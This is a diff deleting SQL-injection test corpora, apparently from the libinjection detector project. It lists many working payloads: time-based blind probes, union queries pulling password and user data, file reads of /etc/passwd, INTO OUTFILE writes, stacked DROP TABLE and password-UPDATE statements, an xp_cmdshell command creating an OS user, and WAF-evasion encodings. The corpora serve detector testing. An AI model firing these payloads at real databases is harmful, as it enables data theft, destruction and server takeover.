@ -1,44 +0,0 @@
#
# http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
#
1 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or 1=1
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999
9999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'9999
9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999
9999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'9999
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
(select like('abcdefg',upper(hex(randomblob(150000000)))))
9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
9999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"9999
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
benchmark(15000000,md5(0x4e446b6e))-9999
9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999
9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)
9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
(select 99999999 from pg_sleep(15)) as test
(select 99999999 from pg_sleep(15))
9999'||(select 99999999 from pg_sleep(15))||'9999
9999"||(select 99999999 from pg_sleep(15))||"9999


@ -1,15 +0,0 @@
# http://www.blackhatlibrary.net/Comparative_precomputation
ascii(substring(version() from 1 for 1))
length((select length(version())))
ascii(substring(length(version()),1,1))
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1)
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1)))
vulnerable_site' and 1=5 or title=() #'
conv(hex(substr(version() FROM 1 FOR 2)),16,10)
conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6
conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6
uncompress(compress(version()))
LENGTH(compress(version()))
LENGTH(version())
LENGTH(load_file('/etc/passwd'))
LENGTH(compress(load_file('/etc/passwd')))


@ -1,40 +0,0 @@
# http://www.exploit-db.com/papers/17934/
# A few typos corrected
1+or+1+%3D+1
1+%7C%7C+1+%3D+1
1+and+1+%3D+1
1+%26%26+1+%3D+1
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+limit+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+group+by+user_id+having+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users+%29+%3D+1
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
1+%7C%7C+1+%3D+1+into+outfile+%27result.txt%27
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+%27a%27
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
1+%7C%7C+user_id+is+not+null
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+0x61
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+unhex%2861%29
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+lower%28conv%2811%2C10%2C36%29%29
1+%7C%7C+lpad%28user%2C7%2C1%29
1%0b||%0blpad(user,7,1)
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+%3D+%27users%27
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+%27a%27+and+%27z%27
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+char%2897%29+and+char%28122%29
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+0x61+and+0x7a
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+like+0x7573657273
1+UnIoN/**/SeLecT/**/1,2,3--
# double url-encoded
## 21%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
21%2f%2a*/union%2f%2a*/select%2f%2a*/1,2,3%2f%2a*/from%2f%2a*/users--
1+/**/union/**/select
1+/%2A%2A/union/%2A%2A/select
1+%2f**%2funion%2f**%2fselect
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0+div+1+union+select+1%2C2%2Ccurrent_user
1+and+(select 1)=(select+0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
1/*!UnIoN*/SeLecT+1,2,3--
=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables+*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
1%27%3B+%2F%2A%26id%3D1%2A%2F+EXEC+%2F%2A%26id%3D1%2A%2F+master..xp_cmdshell+%2F%2A%26id%3D1%2A%2F+net+user+lucifer+UrWaFisShiT+%2F%2A%26id%3D1%2A%2F+--


@ -1,131 +0,0 @@
#
# Frequently not SQLi but
#
select 1 from foo where
select @version from foo where
select 'foo' from bar where
# select 1,1,1,1,1,1,1
# select @version,@version,@version
# select 'foo','bar',1,2,3,4
select sin(1),2 from bar where
select sin(id),2 from bar where
select sin('1'),2 from bar where
select sin(@version),2 from bar where
select sin((1)),2 from bar where
select sin((id)),2 from bar where
select sin(('1')),2 from bar where
select sin((@version)),2 from bar where
select sin(((1)),2 from bar where
select sin(((id)),2 from bar where
select sin((('1')),2 from bar where
select sin(((@version)),2 from bar where
select -sin(1),2 from bar where
select -sin(id),2 from bar where
select -sin('1'),2 from bar where
select -sin(@version),2 from bar where
select -sin((1)),2 from bar where
select -sin((id)),2 from bar where
select -sin(('1')),2 from bar where
select -sin((@version)),2 from bar where
select -sin(((1)),2 from bar where
select -sin(((id)),2 from bar where
select -sin((('1')),2 from bar where
select -sin(((@version)),2 from bar where
select 1,sin(1),2 from bar where
select 1,sin(id),2 from bar where
select 1,sin('1'),2 from bar where
select 1,sin(@version),2 from bar where
select 1,sin((1)),2 from bar where
select 1,sin((id)),2 from bar where
select 1,sin(('1')),2 from bar where
select 1,sin((@version)),2 from bar where
select 1,sin(((1)),2 from bar where
select 1,sin(((id)),2 from bar where
select 1,sin((('1')),2 from bar where
select 1,sin(((@version)),2 from bar where
select -1,sin(1),2 from bar where
select -1,sin(id),2 from bar where
select -1,sin('1'),2 from bar where
select -1,sin(@version),2 from bar where
select -1,sin((1)),2 from bar where
select -1,sin((id)),2 from bar where
select -1,sin(('1')),2 from bar where
select -1,sin((@version)),2 from bar where
select -1,sin(((1)),2 from bar where
select -1,sin(((id)),2 from bar where
select -1,sin((('1')),2 from bar where
select -1,sin(((@version)),2 from bar where
select id,sin(1),2 from bar where
select id,sin(id),2 from bar where
select id,sin('1'),2 from bar where
select id,sin(@version),2 from bar where
select id,sin((1)),2 from bar where
select id,sin((id)),2 from bar where
select id,sin(('1')),2 from bar where
select id,sin((@version)),2 from bar where
select id,sin(((1)),2 from bar where
select id,sin(((id)),2 from bar where
select id,sin((('1')),2 from bar where
select id,sin(((@version)),2 from bar where
select @version,sin(1),2 from bar where
select @version,sin(id),2 from bar where
select @version,sin('1'),2 from bar where
select @version,sin(@version),2 from bar where
select @version,sin((1)),2 from bar where
select @version,sin((id)),2 from bar where
select @version,sin(('1')),2 from bar where
select @version,sin((@version)),2 from bar where
select @version,sin(((1)),2 from bar where
select @version,sin(((id)),2 from bar where
select @version,sin((('1')),2 from bar where
select @version,sin(((@version)),2 from bar where
select '1',sin(1),2 from bar where
select '1',sin(id),2 from bar where
select '1',sin('1'),2 from bar where
select '1',sin(@version),2 from bar where
select '1',sin((1)),2 from bar where
select '1',sin((id)),2 from bar where
select '1',sin(('1')),2 from bar where
select '1',sin((@version)),2 from bar where
select '1',sin(((1)),2 from bar where
select '1',sin(((id)),2 from bar where
select '1',sin((('1')),2 from bar where
select '1',sin(((@version)),2 from bar where
select -'1',sin(1),2 from bar where
select -'1',sin(id),2 from bar where
select -'1',sin('1'),2 from bar where
select -'1',sin(@version),2 from bar where
select -'1',sin((1)),2 from bar where
select -'1',sin((id)),2 from bar where
select -'1',sin(('1')),2 from bar where
select -'1',sin((@version)),2 from bar where
select -'1',sin(((1)),2 from bar where
select -'1',sin(((id)),2 from bar where
select -'1',sin((('1')),2 from bar where
select -'1',sin(((@version)),2 from bar where
select 1,(2),3 from bar where
select (1),(2),3 from bar where
select ((1)),(2),3 from bar where
select (((1))),(2),3 from bar where
select ('1'),(2),3 from bar where
select (('1')),(2),3 from bar where
select ((('1'))),(2),3 from bar where
select (@version),(2),3 from bar where
select ((@version)),(2),3 from bar where
select (((@version))),(2),3 from bar where
select (id),(2),3 from bar where
select ((id)),(2),3 from bar where
select (((id))),(2),3 from bar where
select (@version),(2),3 from bar where
select (((((1,2,3,4)))) from bar


@ -1,315 +0,0 @@
#
#
#
( 'a' ) --
' - ( (SELECT BINARY ( 'b')) ) --
' - ( ( BINARY COS ( 'b')) ) --
' - ( BINARY BINARY ( 'b') ) --
( 1 OR 1 ) --
( 1 OR @a ) --
( ( 1 ) ) --
( 1 * @a ) --
( (SELECT ( 1)) ) --
( (SELECT ( @a)) ) --
( BINARY ( 1) ) --
( BINARY ( @a) ) --
( @a OR 1 ) --
( @a OR @a ) --
( ( @a ) ) --
( ( 1 OR 'b') ) --
( ( 1 * 'b') ) --
( (SELECT ( SELECT 'b')) ) --
( ( SELECT ( 'b')) ) --
( (SELECT 1 OR 'b') ) --
( (SELECT 'a' OR 'b') ) --
( (SELECT BINARY ( 'b')) ) --
( (SELECT BINARY COS ( 'b')) ) --
( (SELECT @a OR 'b') ) --
( COS ( 1 OR 'b') ) --
( COS ( 'a' OR 'b') ) --
( COS ( BINARY ( 'b')) ) --
( COS ( BINARY COS ( 'b')) ) --
( COS ( @a OR 'b') ) --
( 'a' OR 1 ) --
( 'a' OR 'a' ) --
( 'a' OR @a ) --
( 'a' ) --
( 'a' * 1 ) --
( 'a' * 'a' ) --
( 'a' * @a ) --
( BINARY ( SELECT 'b') ) --
( ( BINARY ( 'b')) ) --
( BINARY BINARY ( 'b') ) --
( BINARY BINARY COS ( 'b') ) --
( ( @a OR 'b') ) --
( ( @a * 'b') ) --
( 1 in ( BINARY COS ( 'b')) ) --
( (SELECT ( 1 OR 'b')) ) --
( (SELECT ( SELECT 1)) ) --
( (SELECT ( SELECT @a)) ) --
( (SELECT ( 'a' OR 'b')) ) --
( (SELECT ( BINARY ( 'b'))) ) --
( (SELECT ( BINARY COS ( 'b'))) ) --
( (SELECT ( @a OR 'b')) ) --
( (SELECT 1 OR ( 'b')) ) --
( (SELECT 1 OR 1) ) --
( (SELECT 1 OR COS ( 'b')) ) --
( (SELECT 1 OR @a) ) --
( (SELECT 1 LIMIT 1) ) --
( (SELECT COS ( 1 OR 'b')) ) --
( (SELECT COS ( ( SELECT 'b'))) ) --
( (SELECT COS ( 'a' OR 'b')) ) --
( (SELECT COS ( BINARY ( 'b'))) ) --
( (SELECT COS ( BINARY COS ( 'b'))) ) --
( (SELECT COS ( @a OR 'b')) ) --
( (SELECT 'a' OR ( 'b')) ) --
( (SELECT 'a' OR 1) ) --
( (SELECT 'a' OR COS ( 'b')) ) --
( (SELECT 'a' OR @a) ) --
( (SELECT 'a' LIMIT 1) ) --
( (SELECT BINARY ( 1)) ) --
( (SELECT BINARY ( SELECT 'b')) ) --
( (SELECT BINARY ( COS ( 'b'))) ) --
( (SELECT BINARY ( @a)) ) --
( (SELECT BINARY COS ( 1)) ) --
( (SELECT BINARY COS ( COS ( 'b'))) ) --
( (SELECT BINARY COS ( @a)) ) --
( (SELECT BINARY BINARY ( 'b')) ) --
( (SELECT BINARY BINARY COS ( 'b')) ) --
( (SELECT @a OR ( 'b')) ) --
( (SELECT @a OR 1) ) --
( (SELECT @a OR COS ( 'b')) ) --
( (SELECT @a OR @a) ) --
( (SELECT @a LIMIT 1) ) --
( COS ( 1 OR ( 'b')) ) --
( COS ( 1 OR 1) ) --
( COS ( 1 OR COS ( 'b')) ) --
( COS ( 1 OR @a) ) --
( COS ( COS ( ( SELECT 'b'))) ) --
( COS ( COS ( BINARY ( 'b'))) ) --
( COS ( 'a' OR ( 'b')) ) --
( COS ( 'a' OR 1) ) --
( COS ( 'a' OR COS ( 'b')) ) --
( COS ( 'a' OR @a) ) --
( COS ( BINARY ( 1)) ) --
( COS ( BINARY ( SELECT 'b')) ) --
( COS ( BINARY ( COS ( 'b'))) ) --
( COS ( BINARY ( @a)) ) --
( COS ( BINARY BINARY ( 'b')) ) --
( COS ( BINARY BINARY COS ( 'b')) ) --
( COS ( @a OR ( 'b')) ) --
( COS ( @a OR 1) ) --
( COS ( @a OR COS ( 'b')) ) --
( COS ( @a OR @a) ) --
( BINARY ( 1 OR 'b') ) --
( BINARY ( SELECT ( 'b')) ) --
( BINARY ( SELECT 1) ) --
( BINARY ( SELECT COS ( 'b')) ) --
( BINARY ( SELECT @a) ) --
( BINARY ( 'a' OR 'b') ) --
( BINARY ( BINARY COS ( 'b')) ) --
( BINARY ( @a OR 'b') ) --
( BINARY COS ( 1 OR 'b') ) --
( BINARY COS ( ( SELECT 'b')) ) --
( BINARY COS ( 'a' OR 'b') ) --
( BINARY COS ( BINARY ( 'b')) ) --
( BINARY COS ( BINARY COS ( 'b')) ) --
( BINARY COS ( @a OR 'b') ) --
( BINARY BINARY ( 1) ) --
( BINARY BINARY ( SELECT 'b') ) --
( BINARY BINARY ( COS ( 'b')) ) --
( BINARY BINARY ( @a) ) --
( BINARY BINARY COS ( 1) ) --
( BINARY BINARY COS ( COS ( 'b')) ) --
( BINARY BINARY COS ( @a) ) --
( BINARY BINARY BINARY ( 'b') ) --
( BINARY BINARY BINARY COS ( 'b') ) --
( @a in ( BINARY COS ( 'b')) ) --
( 1 OR ( BINARY ( 'b')) ) --
( 1 OR ( BINARY COS ( 'b')) ) --
( 1 OR COS ( BINARY ( 'b')) ) --
( 1 ) in ( BINARY ( 'b') ) --
( 1 in ( BINARY BINARY ( 'b')) ) --
( 1 * COS ( BINARY ( 'b')) ) --
( (SELECT ( 1 OR ( 'b'))) ) --
( (SELECT ( 1 OR 1)) ) --
( (SELECT ( 1 OR COS ( 'b'))) ) --
( (SELECT ( 1 OR @a)) ) --
( (SELECT ( SELECT 1 OR 'b')) ) --
( (SELECT ( SELECT 'a' OR 'b')) ) --
( (SELECT ( SELECT BINARY ( 'b'))) ) --
( (SELECT ( SELECT BINARY COS ( 'b'))) ) --
( (SELECT ( SELECT @a OR 'b')) ) --
( (SELECT ( COS ( ( SELECT 'b')))) ) --
( (SELECT ( COS ( BINARY ( 'b')))) ) --
( (SELECT ( 'a' OR ( 'b'))) ) --
( (SELECT ( 'a' OR 1)) ) --
( (SELECT ( 'a' OR COS ( 'b'))) ) --
( (SELECT ( 'a' OR @a)) ) --
( (SELECT ( BINARY ( 1))) ) --
( (SELECT ( BINARY ( SELECT 'b'))) ) --
( (SELECT ( BINARY ( COS ( 'b')))) ) --
( (SELECT ( BINARY ( @a))) ) --
( (SELECT ( BINARY BINARY ( 'b'))) ) --
( (SELECT ( BINARY BINARY COS ( 'b'))) ) --
( (SELECT ( @a OR ( 'b'))) ) --
( (SELECT ( @a OR 1)) ) --
( (SELECT ( @a OR COS ( 'b'))) ) --
( (SELECT ( @a OR @a)) ) --
( (SELECT 1 OR ( 1)) ) --
( (SELECT 1 OR ( COS ( 'b'))) ) --
( (SELECT 1 OR ( @a)) ) --
( (SELECT 1 OR 1 * 'b') ) --
( (SELECT 1 OR 'a' * 'b') ) --
( (SELECT 1 OR @a * 'b') ) --
( (SELECT 1 ) OR ( 'b') ) --
( (SELECT 1 ) OR COS ( 'b') ) --
( ( SELECT 1 ) OR 'b' ) --
( (SELECT 1 UNION ( SELECT 'b')) ) --
( (SELECT 1 in ( BINARY ( 'b'))) ) --
( (SELECT COS ( ( SELECT ( 'b')))) ) --
( (SELECT COS ( ( SELECT 1))) ) --
( (SELECT COS ( ( SELECT COS ( 'b')))) ) --
( (SELECT COS ( ( SELECT @a))) ) --
( (SELECT COS ( BINARY BINARY ( 'b'))) ) --
( (SELECT 'a' OR ( 1)) ) --
( (SELECT 'a' OR ( COS ( 'b'))) ) --
( (SELECT 'a' OR ( @a)) ) --
( (SELECT 'a' OR 1 * 'b') ) --
( (SELECT 'a' OR 'a' * 'b') ) --
( (SELECT 'a' OR @a * 'b') ) --
( (SELECT 'a' ) OR ( 'b') ) --
( (SELECT 'a' ) OR COS ( 'b') ) --
( ( SELECT 'a' ) OR 'b' ) --
( (SELECT 'a' UNION ( SELECT 'b')) ) --
( (SELECT 'a' in ( BINARY ( 'b'))) ) --
( (SELECT BINARY ( 1 OR 'b')) ) --
( (SELECT BINARY ( 1 * 'b')) ) --
( (SELECT BINARY ( SELECT ( 'b'))) ) --
( (SELECT BINARY ( SELECT 1)) ) --
( (SELECT BINARY ( SELECT COS ( 'b'))) ) --
( (SELECT BINARY ( SELECT @a)) ) --
( (SELECT BINARY ( 'a' OR 'b')) ) --
( (SELECT BINARY ( 'a' * 'b')) ) --
( (SELECT BINARY ( BINARY ( 'b'))) ) --
( (SELECT BINARY ( BINARY COS ( 'b'))) ) --
( (SELECT BINARY ( @a OR 'b')) ) --
( (SELECT BINARY ( @a * 'b')) ) --
( (SELECT BINARY COS ( ( SELECT 'b'))) ) --
( (SELECT BINARY COS ( BINARY ( 'b'))) ) --
( (SELECT BINARY BINARY ( 1)) ) --
( (SELECT BINARY BINARY ( SELECT 'b')) ) --
( (SELECT BINARY BINARY ( COS ( 'b'))) ) --
( (SELECT BINARY BINARY ( @a)) ) --
( (SELECT BINARY BINARY BINARY ( 'b')) ) --
( (SELECT BINARY BINARY BINARY COS ( 'b')) ) --
( (SELECT @a OR ( 1)) ) --
( (SELECT @a OR ( COS ( 'b'))) ) --
( (SELECT @a OR ( @a)) ) --
( (SELECT @a OR 1 * 'b') ) --
( (SELECT @a OR 'a' * 'b') ) --
( (SELECT @a OR @a * 'b') ) --
( (SELECT @a ) OR ( 'b') ) --
( (SELECT @a ) OR COS ( 'b') ) --
( ( SELECT @a ) OR 'b' ) --
( (SELECT @a UNION ( SELECT 'b')) ) --
( (SELECT @a in ( BINARY ( 'b'))) ) --
( COS ( ( SELECT ( SELECT 'b'))) ) --
( COS ( ( SELECT 1 OR 'b')) ) --
( COS ( ( SELECT 'a' OR 'b')) ) --
( COS ( ( SELECT BINARY ( 'b'))) ) --
( COS ( ( SELECT BINARY COS ( 'b'))) ) --
( COS ( ( SELECT @a OR 'b')) ) --
( COS ( BINARY ( BINARY ( 'b'))) ) --
( COS ( BINARY BINARY BINARY ( 'b')) ) --
( 'a' OR ( BINARY ( 'b')) ) --
( 'a' OR ( BINARY COS ( 'b')) ) --
( 'a' OR COS ( BINARY ( 'b')) ) --
( 'a' ) in ( BINARY ( 'b') ) --
( 'a' * COS ( BINARY ( 'b')) ) --
( BINARY ( 1 OR ( 'b')) ) --
( BINARY ( 1 OR 1) ) --
( BINARY ( 1 OR COS ( 'b')) ) --
( BINARY ( 1 OR @a) ) --
( BINARY ( 1 ) OR 'b' ) --
( BINARY ( SELECT ( 1)) ) --
( BINARY ( SELECT ( SELECT 'b')) ) --
( BINARY ( SELECT ( COS ( 'b'))) ) --
( BINARY ( SELECT ( @a)) ) --
( BINARY ( SELECT 1 OR 'b') ) --
( BINARY ( SELECT 1 * 'b') ) --
( BINARY ( SELECT 'a' OR 'b') ) --
( BINARY ( SELECT 'a' * 'b') ) --
( BINARY ( SELECT BINARY ( 'b')) ) --
( BINARY ( SELECT BINARY COS ( 'b')) ) --
( BINARY ( SELECT @a OR 'b') ) --
( BINARY ( SELECT @a * 'b') ) --
( BINARY ( COS ( ( SELECT 'b'))) ) --
( BINARY ( COS ( BINARY ( 'b'))) ) --
( BINARY ( 'a' OR ( 'b')) ) --
( BINARY ( 'a' OR 1) ) --
( BINARY ( 'a' OR COS ( 'b')) ) --
( BINARY ( 'a' OR @a) ) --
( BINARY ( 'a' ) OR 'b' ) --
( BINARY ( BINARY ( SELECT 'b')) ) --
( BINARY ( BINARY BINARY ( 'b')) ) --
( BINARY ( BINARY BINARY COS ( 'b')) ) --
( BINARY ( @a OR ( 'b')) ) --
( BINARY ( @a OR 1) ) --
( BINARY ( @a OR COS ( 'b')) ) --
( BINARY ( @a OR @a) ) --
( BINARY ( @a ) OR 'b' ) --
( BINARY COS ( ( SELECT ( 'b'))) ) --
( BINARY COS ( ( SELECT 1)) ) --
( BINARY COS ( ( SELECT COS ( 'b'))) ) --
( BINARY COS ( ( SELECT @a)) ) --
( BINARY COS ( BINARY BINARY ( 'b')) ) --
( BINARY BINARY ( 1 OR 'b') ) --
( BINARY BINARY ( 1 * 'b') ) --
( BINARY BINARY ( SELECT ( 'b')) ) --
( BINARY BINARY ( SELECT 1) ) --
( BINARY BINARY ( SELECT COS ( 'b')) ) --
( BINARY BINARY ( SELECT @a) ) --
( BINARY BINARY ( 'a' OR 'b') ) --
( BINARY BINARY ( 'a' * 'b') ) --
( BINARY BINARY ( BINARY ( 'b')) ) --
( BINARY BINARY ( BINARY COS ( 'b')) ) --
( BINARY BINARY ( @a OR 'b') ) --
( BINARY BINARY ( @a * 'b') ) --
( BINARY BINARY COS ( ( SELECT 'b')) ) --
( BINARY BINARY COS ( BINARY ( 'b')) ) --
( BINARY BINARY BINARY ( 1) ) --
( BINARY BINARY BINARY ( SELECT 'b') ) --
( BINARY BINARY BINARY ( COS ( 'b')) ) --
( BINARY BINARY BINARY ( @a) ) --
( BINARY BINARY BINARY BINARY ( 'b') ) --
( BINARY BINARY BINARY BINARY COS ( 'b') ) --
( @a OR ( BINARY ( 'b')) ) --
( @a OR ( BINARY COS ( 'b')) ) --
( @a OR COS ( BINARY ( 'b')) ) --
( @a ) in ( BINARY ( 'b') ) --
( @a in ( BINARY BINARY ( 'b')) ) --
( @a * COS ( BINARY ( 'b')) ) --
( 1 - (SELECT BINARY ( 1)) ) --
( 1 - BINARY ( SELECT 1) ) --
( 1 - BINARY COS ( ( 1)) ) --
( 1 - BINARY BINARY ( 1) ) --
( 1 - BINARY BINARY COS ( 1) ) --
( 1 - BINARY BINARY BINARY ( 'b') ) --
( 'a' or (SELECT BINARY ( 'b')) ) --
( 'a' or BINARY ( SELECT 'b') ) --
( 'a' or BINARY COS ( 1) ) --
( 'a' or BINARY BINARY ( 'b') ) --
( 'a' or BINARY BINARY COS ( 'b') ) --
( 1 IN (1) or (SELECT BINARY ( 'b')) ) --
( 1 IN (1) or BINARY ( SELECT 'b') ) --
( 1 IN (1) or BINARY COS ( 1) ) --
( 1 IN (1) or BINARY BINARY ( 'b') ) --
( 1 IN (1) or BINARY BINARY COS ( 'b') ) --
(select 1 from dual union select 1 limit 1) --
(select 1); (select 1); update users set password = 99
(select 1); select 1; update users set password = 99
select 1; (select 1); update users set password = 99
1; update users set password=1
( (SELECT 'b') ) ; UPDATE user set password = 99;
( (SELECT @a) ) ; UPDATE user set password = 99;


@ -1,6 +0,0 @@
# https://github.com/client9/libinjection/issues/110
# lots of great details in this ticket HT: @lifeforms
id having (1 or 1)
id having (1 or true)
id having (true or 1)


@ -1,4 +0,0 @@
# https://github.com/client9/libinjection/issues/114
# ht @sshayb
; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2


@ -1 +0,0 @@
name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo


@ -1,11 +0,0 @@
# https://github.com/client9/libinjection/issues/125 HT @d0znpp
"-sqlite_version() UNION SELECT password FROM users- --
1337) INTO OUTFILE xxx--
123);DROP TABLE users--
) OR (SELECT password FROM users ...
# the following don't fit into the libinjection model and are
# best handled in another layer, at least for now.
#)-sleep(9999
#*/UNION SELECT password FROM users--


@ -1,3 +0,0 @@
# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/782
.1or-UTC_DATE--


@ -1,265 +0,0 @@
1%20AND%20%28select%20DCount%28last%28username%29
1%29%20from%20users%20where%20username%3D%27ad1min%27%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20substr%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
%28select%20substr%20%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
%28select%20login/2%20from%20users%20limit%201%2C1%29
%28select%20login/2%20%0D%0A%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x00%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x30%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x3%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-0union%20%28select%20id%20from%20users%20limit%201%2C1%29
-union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
